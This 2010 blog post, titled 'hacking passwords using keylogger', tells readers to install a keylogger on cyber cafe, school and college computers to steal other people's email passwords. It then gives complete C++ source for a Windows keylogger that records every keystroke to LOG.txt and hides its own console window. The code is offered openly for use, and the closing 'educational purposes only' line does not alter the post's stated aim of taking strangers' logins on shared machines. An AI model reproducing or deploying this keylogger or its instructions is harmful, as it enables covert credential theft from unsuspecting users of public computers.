Tuesday, October 5, 2010

hacking passwords using keylogger


To hack any ones account just download the following software and double click on it .it will get installed on your computer.the  thing it  do is..... whatever user will type on keyboard all will be saved in a file called log.txt which is a text file ..means passwords will also be saved whenever user log in using internet.remember that log.txt will be saved there where you will keep virus file(the file you have downloaded).you can install this software in cyber cafes or in your college ,school computers by which you can hack many email ids..if u face any problem comment below.......

to create your own keylogger use following method...

                                      first download dev c++ from here

                                       How to install DevC++ and run .cpp file



                                             Launch Dev C++ ,
                                             Click on File-> New-> Project



Choose empty project, type name of project for example hackosys and select C++ Project



Right click on project name and click New File



after this will appear field where you should type code , to execute code click on Execute->Compile & Run or press F9

code 

#include <iostream>
using namespace std;
#include <windows.h>
#include <winuser.h>
int Save (int key_stroke, char *file);
 void Stealth();
 int main()
 {
 Stealth();
 char i;
 while (1)
 {
 for(i = 8; i <= 190; i++)
 {
 if (GetAsyncKeyState(i) == -32767)
 Save (i,"LOG.txt");
 }
 }
 system ("PAUSE");
 return 0;
 }
 /* *********************************** */
 int Save (int key_stroke, char *file)
 {
 if ( (key_stroke == 1) || (key_stroke == 2) )
 return 0;
 FILE *OUTPUT_FILE;
 OUTPUT_FILE = fopen(file, "a+");
 cout << key_stroke << endl;
 if (key_stroke == 8)
 fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
 else if (key_stroke == 13)
 fprintf(OUTPUT_FILE, "%s", "\n");
 else if (key_stroke == 32)
 fprintf(OUTPUT_FILE, "%s", " ");
 else if (key_stroke == VK_TAB)
 fprintf(OUTPUT_FILE, "%s", "[TAB]");
 else if (key_stroke == VK_SHIFT)
 fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
 else if (key_stroke == VK_CONTROL)
 fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
 else if (key_stroke == VK_ESCAPE)
 fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
 else if (key_stroke == VK_END)
 fprintf(OUTPUT_FILE, "%s", "[END]");
 else if (key_stroke == VK_HOME)
 fprintf(OUTPUT_FILE, "%s", "[HOME]");
 else if (key_stroke == VK_LEFT)
 fprintf(OUTPUT_FILE, "%s", "[LEFT]");
 else if (key_stroke == VK_UP)
 fprintf(OUTPUT_FILE, "%s", "[UP]");
 else if (key_stroke == VK_RIGHT)
 fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
 else if (key_stroke == VK_DOWN)
 fprintf(OUTPUT_FILE, "%s", "[DOWN]");
 else if (key_stroke == 190 || key_stroke == 110)
 fprintf(OUTPUT_FILE, "%s", ".");
 else
 fprintf(OUTPUT_FILE, "%s", &key_stroke);
 fclose (OUTPUT_FILE);
 return 0;
 }
 /* *********************************** */
 void Stealth()
 {
 HWND Stealth;
 AllocConsole();
 Stealth = FindWindowA("ConsoleWindowClass", NULL);
 ShowWindow(Stealth,0);
 }

now execute this code


The content in this article is presented for educational purposes only
if you face any problem regarding tutorial then do write to us...

0 comments:

Post a Comment